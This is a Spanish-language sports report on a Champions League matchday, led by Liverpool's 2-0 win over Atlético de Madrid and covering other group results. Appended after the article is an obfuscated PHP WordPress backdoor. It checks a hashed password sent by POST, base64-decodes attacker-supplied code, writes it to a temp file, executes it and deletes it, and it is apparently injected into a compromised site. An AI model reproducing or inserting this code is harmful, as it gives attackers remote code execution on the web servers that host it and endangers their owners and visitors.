Liverpool bailó a Atlético de Madrid, pero se quedó corto con el resultado

Foto: UEFA

Liverpool superó a Atlético de Madrid 2-0, por la cuarta fecha del Grupo B de la Champions League, y logró, con puntaje ideal, la clasificación anticipada -faltan dos fechas para concluir esta ronda- a los octavos de final.

La diferencia corta en el resultado fue rotunda en el juego. El conjunto de Jurgen Klopp fue ampliamente superior al del Cholo Simeone. A los 21 minutos estaba arriba con los goles de Diego Jota y Mané. Y a los 36, fue expulsado Felipe.

La gran superioridad, en posesión, llegadas y control, de Liverpool fue intensa hasta los 15 minutos del segundo tiempo. A partir de ahí, el equipo inglés bajó el ritmo, aunque mantuvo el dominio, y Atlético -con Rodrigo De Paul (salvó un gol sobre la línea) y Ángel Correa, de titulares- se cuidó para evitar ser goleado.

En el otro partido de este Grupo B, Milan y Porto igualaron 1-1. Liverpool lidera con 12 puntos, seguido por Porto con 5, Atlético de Madrid con 4 y Milan con 1.

Ajax también sacó boleto anticipado a la siguiente fase, logrando su cuarto triunfo en el Grupo C. El conjunto neerlandés venció a Dortmund 3-1 en Alemania. En el otro partido del Grupo, Sporting Lisboa goleó a Besiktas 4-0.

PSG empató con RB Leipzig 2-2, por el Grupo A, en Alemania. Los alemanes empataron, de penal, en el segundo minuto de descuento. En el conjunto de Mauricio Pochettino, Ángel Di Maria arrancó de titular y Mauro Icardi ingresó en los instantes finales. Estuvieron ausentes por lesiones, Lionel Messi y Leandro Paredes. Georginio Wijnaldum anotó los dos goles del PSG.

Foto: UEFA

Ese Grupo tiene como líder a Manchester City -con un punto más que PSG-, que goleó, de local, a Brujas 4-1, con goles de Foden, Mahrez, Sterling y Gabriel Jesús.

Inter superó, de visitante, a Sheriff 3-1 y está segundo en el Grupo D, que tiene como líder a Real Madrid, que había ganado en primer turno. Lautaro Martínez fue titular y Joaquín Correa ingresó al final en el equipo italiano.

En los partidos jugados ayer, por los otros Grupos, Juventus y Bayern Munich se habían asegurado el pase a octavos faltando disputarse dos fechas.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}